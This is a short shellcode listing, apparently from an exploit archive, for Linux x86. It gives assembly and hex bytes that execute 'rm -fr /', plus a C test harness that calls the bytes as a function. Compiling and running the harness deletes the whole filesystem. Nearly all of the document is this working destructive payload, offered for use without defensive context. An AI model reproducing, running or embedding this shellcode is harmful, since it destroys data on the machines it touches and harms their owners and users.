58 bytes small Linux/x86 rm -fr / shellcode.
f97ca9b35911145e544f8f2c9253eb7646968fcbab53346ae763b8c0513a2b5a
/*
# Title: Linux x86 'rm -fr /' shellcode
# Author: nitr0us [ http://twitter.com/nitr0usmx ]
# Size: 58 bytes
# Arch: Linux x86
ASM CODE:
jmp pushstring
retro:
xorl %edx,%edx
popl %ebx
movb %dl,0x7(%ebx)
movb %dl,0xb(%ebx)
movb %dl,0xd(%ebx)
movl %ebx,0xe(%ebx)
leal 0x8(%ebx),%esi
movl %esi,0x12(%ebx)
leal 0xc(%ebx),%esi
movl %esi,0x16(%ebx)
movl %edx,0x1a(%ebx)
leal 0xe(%ebx),%ecx
pushl $0xb
popl %eax
int $0x80
pushstring:
call retro
.string "/bin/rmX-frX/"
http://chatsubo-labs.blogspot.com
http://www.brainoverflow.org
*/
char shellcode[]=
"\xeb\x26\x31\xd2\x5b\x88\x53\x07\x88\x53\x0b\x88\x53\x0d\x89\x5b"
"\x0e\x8d\x73\x08\x89\x73\x12\x8d\x73\x0c\x89\x73\x16\x89\x53\x1a"
"\x8d\x4b\x0e\x6a\x0b\x58\xcd\x80\xe8\xd5\xff\xff\xff"
"/bin/rmX-frX/";
main()
{
void(*rmfr)(void);
printf("rm -fr / : %d bytes\n", sizeof(shellcode));
rmfr = shellcode;
rmfr();
}